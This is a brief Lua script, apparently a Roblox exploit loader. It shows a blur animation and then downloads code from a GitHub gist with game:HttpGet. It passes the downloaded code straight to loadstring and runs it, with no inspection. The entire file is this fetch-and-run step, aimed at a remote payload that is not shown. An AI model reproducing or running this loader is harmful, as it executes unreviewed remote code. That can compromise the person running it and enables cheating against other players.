local L = game:GetService("Lighting") local b = Instance.new("BlurEffect", L) b.Size = 0 for i = 0, 20, 2 do b.Size = i task.wait(.05) end task.wait(math.random(0.1, 0.3)) local url = "https://gist.githubusercontent.com/Foki42/e74135b56009426bfdc2e6a1bedbdde0/raw/" local s, c = pcall(game.HttpGet, game, url, true) task.wait(math.random(0.2, 0.5)) if s and c then for i = 20, 0, -2 do b.Size = i task.wait(.05) end b:Destroy() loadstring(c)() print("✅ Loaded") else b:Destroy() warn("❌ Failed") end